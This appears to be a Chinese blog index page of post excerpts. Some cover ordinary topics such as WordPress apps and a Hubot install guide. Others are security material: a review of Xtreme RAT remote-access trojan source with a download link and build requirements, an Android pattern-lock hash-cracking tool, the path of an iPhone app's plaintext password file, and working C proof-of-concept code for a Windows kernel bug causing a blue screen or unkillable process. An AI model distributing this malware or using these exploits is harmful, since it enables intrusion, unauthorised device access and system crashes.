一些与WordPress相关的东西

1dzob

其实和blog相关的应用还是蛮多的,比如wp官方的app,有android和ios版本的,上面左边是android的,右边是ios的。其实很多应用对于不同的平台显示的效果确实存在不小的差异,比如那个淘宝的客户端。在安卓系统上有个聚划算,还有什么乱七八糟的东西,但是在ios上却什么都没有,由此看见用iphone的都是有钱人,上面都是什么奢侈品之类的。

最后的那个统计功能要用到wp的一个插件jetpack,昨天推荐给小白童鞋的时候小白童鞋说功能太多了,用不到,哈哈。

Continue Reading

Xtreme RAT Unicode 3.6 源代码

1dyBk

客观的来说这款rat的效果并不是非常完美,我个人的编译版本可以上线,但是ping值太高(即使是本机测试)。除了有个皮肤之外其余的也没什么比较好的效果(皮肤还会不断的刷新导致闪烁,不知道是不是我的控件版本的问题)。另外一个问题就是先要编译这个程序并没有那额简单,需要安装非常多的控件,并且设置比较多的东西。(推荐使用delphi 2010以上版本编译),这个包本身是没有控件的,用到的控件列表如下:

AlphaControls 7.69 ,KOL ,TMS.Component.Pack.v6.4.4.1 ,VirtualTreeViewV5.1.0

Link:http://dl.dropbox.com/u/26758097/Rat%20source%20code/19854781Xtreme-RAT-Unicode2.rar

Andoid 图形屏幕锁破解

cracked

其实最早看到关于破解访问图案是在看雪的一篇文章中:http://bbs.pediy.com/showthread.php?t=166933。详细信息可以参考这篇文章,至于有什么不明白的那就去Google吧。

今天看到一份代码,用于生成哈希库,既然数据都有了,还不直接把搜索功能一块加进去?这不是蛋疼嘛。于是我自己完善了一下,可以直接用来对gesture.key进行搜索,免得自己去查找。当然了如果愿意自己去查也是很快的,生成的就是个文本数据库,直接用记事本打开查就行了。

Continue Reading

Web Albums(iPhone) 的蛋疼明文密码

webpicasa

一款蛮不错的的Picasa相册同步软件,并且还有个密码保护功能,看起来很帅的样子。设置密码之后习惯性的想看下密码保存在什么地方,是不是明文的,于是随便在文件夹下翻了翻,不小心就找到了。娃哈哈,蛋疼啊,如果忘记密码了去软件目录下找到这个文件:

/var/mobile/Applications/51AE867E-C284-4961-B6D6-48428404FE12/Library/Preferences/com.yourcompany.PhotoGator.plist

Continue Reading

hubot install. hubot 机器人安裝

hubot

 

Hubot

This is a version of GitHub’s Campfire bot, hubot. He’s pretty cool.

You’ll probably never have to hack on this repo directly.

Instead this repo provides a library that’s distributed by npm that you simply require in your project. Follow the instructions below and get your own hubot ready to deploy.

1.安装nodejsnpm (node v0.6.3+版本以后已经集成npm)

2.安装redis数据库
http://redis.googlecode.com 下载redis

$ tar xzf redis-x.x.x.x.tar.gz 解压文件
$ cd redis-2.4.1
$ make

启动服务: $ src/redis-server

Continue Reading

ProcessIoPriority Bug (BSOD/Non-Killable Process)

//http://waleedassar.blogspot.com
//http://www.twitter.com/waleedassar

BSOD:
#define ProcessIoPriority               0x21
int main()
{
    unsigned long val=0xFFFFFFFF;
    int ret=ZwSetInformationProcess(GetCurrentProcess(),ProcessIoPriority,&val,0x4);
    if(ret<0) printf("Error %x\r\n",ret);
    ExitProcess(0);
    return 0;
}

Non-Killable Process:

#define ProcessIoPriority               0x21
int main()
{
    unsigned long val=0x8000F129;
    int ret=ZwSetInformationProcess(GetCurrentProcess(),ProcessIoPriority,&val,0x4);
    if(ret<0) printf("Error %x\r\n",ret);
    ExitProcess(0);
    return 0;
}

Description:
With the “ProcessInformationClass” parameter set to ProcessIoPriority 0x21, passing certain signed values e.g. 0xFFFFFFFF or 0x8000F129 in the variable pointed to by the “ProcessInformation” parameter to the ntdll “ZwSetInformationProcess” function can be abused to arbitrarily set certain bit flags of the corresponding “_EPROCESS” structure e.g. DefaultIoPriority: Pos 27, ProcessSelfDelete : Pos 30, or SetTimerResolutionLink: Pos 31.

Link:http://waleedassar.blogspot.tw/2013/02/kernel-bug-1-processiopriority.html